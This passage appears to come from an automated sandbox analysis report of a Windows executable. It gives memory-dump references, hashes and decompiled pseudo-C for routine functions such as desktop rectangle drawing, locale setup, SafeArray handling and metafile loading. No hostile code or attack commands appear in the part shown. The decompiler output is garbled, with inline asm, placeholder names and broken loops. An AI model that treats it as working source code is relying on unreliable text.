                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92202b19f1365d19918ce5d45f64d1343273fd33ec9b2b21f99fd722066f77f3
                                  • Instruction ID: a7af99fdf132f76144e98508861555a1ecf8b8a12daa4f0965542776ccba9f2e
                                  • Opcode Fuzzy Hash: 92202b19f1365d19918ce5d45f64d1343273fd33ec9b2b21f99fd722066f77f3
                                  • Instruction Fuzzy Hash: 18513DB0208740AFE320DF69C841B6BB7E9AF47304F05881EB9D6D7352D639EC448B1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E00447844(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				struct HWND__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				int _v32;
                                  				int _v36;
                                  				int _t76;
                                  				intOrPtr _t82;
                                  				int _t85;
                                  				void* _t90;
                                  				int _t91;
                                  				void* _t94;
                                  				void* _t95;
                                  				intOrPtr _t96;
                                  
                                  				_t94 = _t95;
                                  				_t96 = _t95 + 0xffffffe0;
                                  				_v5 = __ecx;
                                  				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
                                  				if(_v5 == 0) {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t90);
                                  				} else {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t90);
                                  				}
                                  				_v12 = GetDesktopWindow();
                                  				_v16 = GetDCEx(_v12, 0, 0x402);
                                  				_push(_t94);
                                  				_push(0x44795f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t96;
                                  				_v20 = SelectObject(_v16, E00428C98( *((intOrPtr*)(_t90 + 0x40))));
                                  				_t91 = _v36;
                                  				_t85 = _v32;
                                  				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
                                  				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
                                  				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
                                  				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
                                  				SelectObject(_v16, _v20);
                                  				_pop(_t82);
                                  				 *[fs:eax] = _t82;
                                  				_push(0x447966);
                                  				return ReleaseDC(_v12, _v16);
                                  			}


                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0044787B
                                  • GetDCEx.USER32 ref: 0044788E
                                  • SelectObject.GDI32(?,00000000), ref: 004478B1
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004478D7
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004478F9
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00447918
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00447932
                                  • SelectObject.GDI32(?,?), ref: 0044793F
                                  • ReleaseDC.USER32(?,?), ref: 00447959
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ObjectSelect$DesktopReleaseWindow
                                  • String ID:
                                  • API String ID: 1187665388-0
                                  • Opcode ID: 73d2d2713da67a8e4f16186487b6fb5140cbc0002e4e46d294e763d739c48c77
                                  • Instruction ID: 052d6a264ad795e68cc8814362e554f8ce98474a4756b9ffa59b8818ee78a9f9
                                  • Opcode Fuzzy Hash: 73d2d2713da67a8e4f16186487b6fb5140cbc0002e4e46d294e763d739c48c77
                                  • Instruction Fuzzy Hash: E3310CB6E04219AFDB00DEEDCC89DAFBBBCEF49704B014569B514F7241C679AD048BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0040DC84(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void* _t104;
                                  				void* _t111;
                                  				void* _t133;
                                  				intOrPtr _t183;
                                  				intOrPtr _t193;
                                  				intOrPtr _t194;
                                  
                                  				_t191 = __esi;
                                  				_t190 = __edi;
                                  				_t193 = _t194;
                                  				_t133 = 8;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t133 = _t133 - 1;
                                  				} while (_t133 != 0);
                                  				_push(__ebx);
                                  				_push(_t193);
                                  				_push(0x40df4f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t194;
                                  				E0040DB0C();
                                  				E0040C384(__ebx, __edi, __esi);
                                  				_t196 =  *0x4bc750;
                                  				if( *0x4bc750 != 0) {
                                  					E0040C55C(__esi, _t196);
                                  				}
                                  				_t132 = GetThreadLocale();
                                  				E0040C2D4(_t43, 0, 0x14,  &_v20);
                                  				E0040442C(0x4bc684, _v20);
                                  				E0040C2D4(_t43, 0x40df64, 0x1b,  &_v24);
                                  				 *0x4bc688 = E00408EF0(0x40df64, 0, _t196);
                                  				E0040C2D4(_t132, 0x40df64, 0x1c,  &_v28);
                                  				 *0x4bc689 = E00408EF0(0x40df64, 0, _t196);
                                  				 *0x4bc68a = E0040C320(_t132, 0x2c, 0xf);
                                  				 *0x4bc68b = E0040C320(_t132, 0x2e, 0xe);
                                  				E0040C2D4(_t132, 0x40df64, 0x19,  &_v32);
                                  				 *0x4bc68c = E00408EF0(0x40df64, 0, _t196);
                                  				 *0x4bc68d = E0040C320(_t132, 0x2f, 0x1d);
                                  				E0040C2D4(_t132, "m/d/yy", 0x1f,  &_v40);
                                  				E0040C60C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                  				E0040442C(0x4bc690, _v36);
                                  				E0040C2D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                  				E0040C60C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                  				E0040442C(0x4bc694, _v44);
                                  				 *0x4bc698 = E0040C320(_t132, 0x3a, 0x1e);
                                  				E0040C2D4(_t132, 0x40df98, 0x28,  &_v52);
                                  				E0040442C(0x4bc69c, _v52);
                                  				E0040C2D4(_t132, 0x40dfa4, 0x29,  &_v56);
                                  				E0040442C(0x4bc6a0, _v56);
                                  				E004043D8( &_v12);
                                  				E004043D8( &_v16);
                                  				E0040C2D4(_t132, 0x40df64, 0x25,  &_v60);
                                  				_t104 = E00408EF0(0x40df64, 0, _t196);
                                  				_t197 = _t104;
                                  				if(_t104 != 0) {
                                  					E00404470( &_v8, 0x40dfbc);
                                  				} else {
                                  					E00404470( &_v8, 0x40dfb0);
                                  				}
                                  				E0040C2D4(_t132, 0x40df64, 0x23,  &_v64);
                                  				_t111 = E00408EF0(0x40df64, 0, _t197);
                                  				_t198 = _t111;
                                  				if(_t111 == 0) {
                                  					E0040C2D4(_t132, 0x40df64, 0x1005,  &_v68);
                                  					if(E00408EF0(0x40df64, 0, _t198) != 0) {
                                  						E00404470( &_v12, 0x40dfd8);
                                  					} else {
                                  						E00404470( &_v16, 0x40dfc8);
                                  					}
                                  				}
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm");
                                  				_push(_v16);
                                  				E00404758();
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm:ss");
                                  				_push(_v16);
                                  				E00404758();
                                  				 *0x4bc752 = E0040C320(_t132, 0x2c, 0xc);
                                  				_pop(_t183);
                                  				 *[fs:eax] = _t183;
                                  				_push(E0040DF56);
                                  				return E004043FC( &_v68, 0x10);
                                  			}


                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040DF4F,?,?,00000000,00000000), ref: 0040DCBA
                                    • Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: e8c9d774b8b2df05bcb252d0bf76ea733982fb600d781e0ddc32bfc1c4268f7e
                                  • Instruction ID: fe3088db23ddf9f2fe55ec598fc93550c623c21a3c6a9f23a321fd8cfddd8580
                                  • Opcode Fuzzy Hash: e8c9d774b8b2df05bcb252d0bf76ea733982fb600d781e0ddc32bfc1c4268f7e
                                  • Instruction Fuzzy Hash: 7E616A70B002499BDB00FBF5D8C1A9E73A69B98304F50E13BB501BB6C6CA3CD909976D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00416F20(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				signed int _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char* _v48;
                                  				char _v52;
                                  				signed int _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v320;
                                  				char _v324;
                                  				intOrPtr _t57;
                                  				intOrPtr* _t61;
                                  				intOrPtr _t65;
                                  				intOrPtr _t69;
                                  				intOrPtr _t71;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  				intOrPtr* _t76;
                                  				intOrPtr _t79;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t89;
                                  				intOrPtr _t93;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				void* _t105;
                                  				void* _t106;
                                  				intOrPtr _t107;
                                  				signed int _t114;
                                  				signed int _t115;
                                  				char _t123;
                                  				intOrPtr _t129;
                                  				signed int _t138;
                                  				intOrPtr _t145;
                                  				void* _t147;
                                  				void* _t148;
                                  				intOrPtr _t149;
                                  				void* _t160;
                                  
                                  				_t144 = __esi;
                                  				_t141 = __edi;
                                  				_t123 = __edx;
                                  				_t115 = __ecx;
                                  				_t147 = _t148;
                                  				_t149 = _t148 + 0xfffffec0;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v324 = 0;
                                  				_v40 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				if(__edx != 0) {
                                  					_t149 = _t149 + 0xfffffff0;
                                  					_t57 = E00403984(_t57, _t147);
                                  				}
                                  				_v12 = _t115;
                                  				_v9 = _t123;
                                  				_v8 = _t57;
                                  				_push(_t147);
                                  				_push(0x41717d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t149;
                                  				E004035DC(0);
                                  				_push(0x4bc828);
                                  				L00406AC4();
                                  				_t116 = 0;
                                  				_push(_t147);
                                  				_push(0x417150);
                                  				_push( *[fs:ecx]);
                                  				 *[fs:ecx] = _t149;
                                  				_t114 = (_v12 & 0x0000ffff) - 0x100;
                                  				if(_t114 < 0 || _v12 < 0x10f) {
                                  					_t61 =  *0x4bb1b0; // 0x4a012c
                                  					_v28 =  *_t61;
                                  					_v24 = 0xb;
                                  					_v20 = _v12 & 0x0000ffff;
                                  					_v16 = 0;
                                  					_t65 =  *0x4bae98; // 0x40795c
                                  					E0040656C(_t65, _t116,  &_v32);
                                  					_t116 = _v32;
                                  					E0040CB00(_t114, _v32, 1, _t141, _t144, 1,  &_v28);
                                  					E00403DEC();
                                  				}
                                  				_t69 =  *0x4bc824; // 0x1c41ebc
                                  				_t145 = E0040564C(_t69);
                                  				if(_t145 <= _t114) {
                                  					asm("cdq");
                                  					_t141 = (_t114 / 0xf + 1 << 4) - _t114 / 0xf + 1;
                                  					if(_t141 > 0x7ff) {
                                  						_t107 =  *0x4badc8; // 0x407974
                                  						E0040656C(_t107, 0xf,  &_v36);
                                  						E0040CAC4(_v36, 1);
                                  						E00403DEC();
                                  					}
                                  					_push(_t141);
                                  					_t116 = 1;
                                  					E00405828();
                                  					_t102 =  *0x4bc824; // 0x1c41ebc
                                  					_t103 = E0040564C(_t102);
                                  					_t138 = _t145;
                                  					_t105 = _t103 - 1 - _t138;
                                  					if(_t105 >= 0) {
                                  						_t106 = _t105 + 1;
                                  						do {
                                  							_t116 =  *0x4bc824; // 0x1c41ebc
                                  							_t145 = 0;
                                  							 *((intOrPtr*)(_t116 + _t138 * 4)) = 0;
                                  							_t138 = _t138 + 1;
                                  							_t106 = _t106 - 1;
                                  						} while (_t106 != 0);
                                  					}
                                  				}
                                  				_t71 =  *0x4bc824; // 0x1c41ebc
                                  				_t72 =  *((intOrPtr*)(_t71 + _t114 * 4));
                                  				if(_t72 != 0) {
                                  					_t160 = _t72 -  *0x4a0474; // 0xffffffff
                                  					if(_t160 != 0) {
                                  						_t76 =  *0x4bb1b0; // 0x4a012c
                                  						_v64 =  *_t76;
                                  						_v60 = 0xb;
                                  						_v56 = _v12 & 0x0000ffff;
                                  						_v52 = 0;
                                  						_t79 =  *0x4bc824; // 0x1c41ebc
                                  						E0040355C( *((intOrPtr*)( *((intOrPtr*)(_t79 + _t114 * 4)))),  &_v320);
                                  						_v48 =  &_v320;
                                  						_v44 = 4;
                                  						_t85 =  *0x4bad10; // 0x407964
                                  						E0040656C(_t85, _t116,  &_v324);
                                  						E0040CB00(_t114, _v324, 1, _t141, _t145, 2,  &_v64);
                                  						E00403DEC();
                                  					} else {
                                  						_t89 =  *0x4bb1b0; // 0x4a012c
                                  						_v28 =  *_t89;
                                  						_v24 = 0xb;
                                  						_v20 = _v12 & 0x0000ffff;
                                  						_v16 = 0;
                                  						_t93 =  *0x4baf38; // 0x40796c
                                  						E0040656C(_t93, _t116,  &_v40);
                                  						E0040CB00(_t114, _v40, 1, _t141, _t145, 1,  &_v28);
                                  						E00403DEC();
                                  					}
                                  				}
                                  				_t73 =  *0x4bc824; // 0x1c41ebc
                                  				 *((intOrPtr*)(_t73 + _t114 * 4)) = _v8;
                                  				 *((short*)(_v8 + 4)) = _v12;
                                  				_pop(_t129);
                                  				 *[fs:eax] = _t129;
                                  				_push(E00417157);
                                  				_push(0x4bc828);
                                  				L00406C2C();
                                  				return 0;
                                  			}

                                  0x0041714a
                                  0x0041714f

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(004BC828,00000000,0041717D), ref: 00416F70
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  • RtlLeaveCriticalSection.KERNEL32(004BC828,00417157,00417150,?,004BC828,00000000,0041717D), ref: 0041714A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveLoadString
                                  • String ID: DmA$\y@$dy@$ly@$ty@
                                  • API String ID: 2800025304-3753360372
                                  • Opcode ID: 7744faa271088df62b5dcf0486099282ee15f47e64ba6f0acf8cd78b662ba490
                                  • Instruction ID: dfba0e48724b562cef64671c5921ead9b711b7a838850d76f9f14f94c4d6bf22
                                  • Opcode Fuzzy Hash: 7744faa271088df62b5dcf0486099282ee15f47e64ba6f0acf8cd78b662ba490
                                  • Instruction Fuzzy Hash: 7D615F70A002089FCB10EF69D8C1AEDBBF5EB49704F14417AE944A73A1D779AD40CF69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E004107D0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				short* _v776;
                                  				intOrPtr _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				intOrPtr _v792;
                                  				signed short* _v796;
                                  				char _v800;
                                  				char _v804;
                                  				intOrPtr* _v808;
                                  				void* __ebp;
                                  				signed char _t51;
                                  				signed int _t58;
                                  				void* _t66;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t96;
                                  				void* _t98;
                                  				void* _t100;
                                  				void* _t103;
                                  				void* _t104;
                                  				intOrPtr* _t114;
                                  				void* _t118;
                                  				char* _t119;
                                  				void* _t120;
                                  
                                  				_t105 = __ecx;
                                  				_v780 = __ecx;
                                  				_t96 = __edx;
                                  				_v776 = __eax;
                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                  					E00410378(0x80070057);
                                  				}
                                  				_t51 =  *_t96;
                                  				if((_t51 & 0x00000fff) != 0xc) {
                                  					_push(_t96);
                                  					_push(_v776);
                                  					L0040EEC8();
                                  					return E00410378(_v776);
                                  				} else {
                                  					if((_t51 & 0x00000040) == 0) {
                                  						_v796 =  *((intOrPtr*)(_t96 + 8));
                                  					} else {
                                  						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
                                  					}
                                  					_v788 =  *_v796 & 0x0000ffff;
                                  					_t98 = _v788 - 1;
                                  					if(_t98 < 0) {
                                  						L9:
                                  						_push( &_v772);
                                  						_t58 = _v788;
                                  						_push(_t58);
                                  						_push(0xc);
                                  						L0040F324();
                                  						_v792 = _t58;
                                  						if(_v792 == 0) {
                                  							E004100D0(_t105);
                                  						}
                                  						E00410728(_v776);
                                  						 *_v776 = 0x200c;
                                  						 *((intOrPtr*)(_v776 + 8)) = _v792;
                                  						_t100 = _v788 - 1;
                                  						if(_t100 < 0) {
                                  							L14:
                                  							_t102 = _v788 - 1;
                                  							if(E00410744(_v788 - 1, _t120) != 0) {
                                  								L0040F35C();
                                  								E00410378(_v796);
                                  								L0040F35C();
                                  								E00410378(_v792);
                                  								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
                                  							}
                                  							_t66 = E00410774(_t102, _t120);
                                  						} else {
                                  							_t103 = _t100 + 1;
                                  							_t78 =  &_v768;
                                  							_t114 =  &_v260;
                                  							do {
                                  								 *_t114 =  *_t78;
                                  								_t114 = _t114 + 4;
                                  								_t78 = _t78 + 8;
                                  								_t103 = _t103 - 1;
                                  							} while (_t103 != 0);
                                  							do {
                                  								goto L14;
                                  							} while (_t66 != 0);
                                  							return _t66;
                                  						}
                                  					} else {
                                  						_t104 = _t98 + 1;
                                  						_t118 = 0;
                                  						_t119 =  &_v772;
                                  						do {
                                  							_v808 = _t119;
                                  							_push(_v808 + 4);
                                  							_t18 = _t118 + 1; // 0x1
                                  							_push(_v796);
                                  							L0040F32C();
                                  							E00410378(_v796);
                                  							_push( &_v784);
                                  							_t21 = _t118 + 1; // 0x1
                                  							_push(_v796);
                                  							L0040F334();
                                  							E00410378(_v796);
                                  							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
                                  							_t118 = _t118 + 1;
                                  							_t119 = _t119 + 8;
                                  							_t104 = _t104 - 1;
                                  						} while (_t104 != 0);
                                  						goto L9;
                                  					}
                                  				}
                                  			}





























                                  0x004107d0
                                  0x004107dc
                                  0x004107e2
                                  0x004107e4
                                  0x004107ee
                                  0x004107f5
                                  0x004107f5
                                  0x004107fa
                                  0x00410808
                                  0x00410996
                                  0x0041099d
                                  0x0041099e
                                  0x00000000
                                  0x0041080e
                                  0x00410811
                                  0x00410823
                                  0x00410813
                                  0x00410818
                                  0x00410818
                                  0x00410832
                                  0x0041083e
                                  0x00410841
                                  0x004108ae
                                  0x004108b4
                                  0x004108b5
                                  0x004108bb
                                  0x004108bc
                                  0x004108be
                                  0x004108c3
                                  0x004108d0
                                  0x004108d2
                                  0x004108d2
                                  0x004108dd
                                  0x004108e8
                                  0x004108f9
                                  0x00410902
                                  0x00410905
                                  0x00410921
                                  0x00410928
                                  0x00410933
                                  0x0041094a
                                  0x0041094f
                                  0x00410969
                                  0x0041096e
                                  0x00410981
                                  0x00410981
                                  0x0041098a
                                  0x00410907
                                  0x00410907
                                  0x00410908
                                  0x0041090e
                                  0x00410914
                                  0x00410916
                                  0x00410918
                                  0x0041091b
                                  0x0041091e
                                  0x0041091e
                                  0x00410921
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410921
                                  0x00410843
                                  0x00410843
                                  0x00410844
                                  0x00410846
                                  0x0041084c
                                  0x0041084e
                                  0x0041085d
                                  0x0041085e
                                  0x00410868
                                  0x00410869
                                  0x0041086e
                                  0x00410879
                                  0x0041087a
                                  0x00410884
                                  0x00410885
                                  0x0041088a
                                  0x004108a5
                                  0x004108a7
                                  0x004108a8
                                  0x004108ab
                                  0x004108ab
                                  0x00000000
                                  0x0041084c
                                  0x00410841

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410869
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410885
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 004108BE
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041094A
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410969
                                  • VariantCopy.OLEAUT32(?), ref: 0041099E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: fbf0aca35e5e79794d881292854d23dfe8fd71cc01930bb9e2c050051ee0aef9
                                  • Instruction ID: e28228e0896c1e5e64a5986b68fafb10ea955b9b6fe76349267b1c3d6d9b6922
                                  • Opcode Fuzzy Hash: fbf0aca35e5e79794d881292854d23dfe8fd71cc01930bb9e2c050051ee0aef9
                                  • Instruction Fuzzy Hash: 6851EC7590021D9BCB61EB59C891BD9B3FCAF4C314F4041EAE508E7252D674AFC58F68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetActiveWindow.USER32 ref: 004675AF
                                  • GetWindowRect.USER32 ref: 00467609
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00467641
                                  • MessageBoxA.USER32 ref: 00467682
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 004676D2
                                  • SetActiveWindow.USER32(?), ref: 004676E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: 13bd67af783d30af5c9173b1492e2fcf31705a082cfa829788fcd296847459b1
                                  • Instruction ID: 193e5c1017d00ba57c58a2faf3713903dc5bc01be3baf6e39d3ee82a262e33c8
                                  • Opcode Fuzzy Hash: 13bd67af783d30af5c9173b1492e2fcf31705a082cfa829788fcd296847459b1
                                  • Instruction Fuzzy Hash: 07413C75E04108AFDB04DBA9CD85FAE77F9EB48304F14446AF904E7391D678AD008B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0042BCD8(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				int _v12;
                                  				BYTE* _v16;
                                  				intOrPtr _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				short _v30;
                                  				short _v32;
                                  				char _v38;
                                  				struct tagMETAFILEPICT _v54;
                                  				intOrPtr _v118;
                                  				intOrPtr _v122;
                                  				struct tagENHMETAHEADER _v154;
                                  				intOrPtr _t103;
                                  				char* _t110;
                                  				intOrPtr _t115;
                                  				struct HENHMETAFILE__* _t119;
                                  				struct HENHMETAFILE__* _t120;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t124;
                                  				void* _t125;
                                  				intOrPtr _t126;
                                  
                                  				_t124 = _t125;
                                  				_t126 = _t125 + 0xffffff68;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t122 = __eax;
                                  				E0042BB74(__eax);
                                  				_t110 =  &_v38;
                                  				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                  				if(_v38 != 0x9ac6cdd7 || E0042A63C( &_v38) != _v18) {
                                  					E004297CC();
                                  				}
                                  				_v12 = _v12 - 0x16;
                                  				_v16 = E00402AE4(_v12, 0x16, _t110);
                                  				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                  				 *[fs:eax] = _t126;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42be47, _t124);
                                  				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                  				if(_v24 == 0) {
                                  					_v24 = 0x60;
                                  				}
                                  				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                  				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                  				_v54.mm = 8;
                                  				_v54.xExt = 0;
                                  				_v54.yExt = 0;
                                  				_v54.hMF = 0;
                                  				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t119;
                                  				if(_t119 == 0) {
                                  					E004297CC();
                                  				}
                                  				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                  				_v54.mm = 8;
                                  				_v54.xExt = _v122;
                                  				_v54.yExt = _v118;
                                  				_v54.hMF = 0;
                                  				DeleteEnhMetaFile( *(_t103 + 8));
                                  				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t120;
                                  				if(_t120 == 0) {
                                  					E004297CC();
                                  				}
                                  				 *((char*)(_t122 + 0x2c)) = 0;
                                  				_pop(_t115);
                                  				 *[fs:eax] = _t115;
                                  				_push(0x42be4e);
                                  				return E00402B14(_v16);
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32 ref: 0042BD7A
                                  • MulDiv.KERNEL32 ref: 0042BD97
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 0042BDC3
                                  • GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 0042BDE3
                                  • DeleteEnhMetaFile.GDI32(00000016), ref: 0042BE04
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 0042BE17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
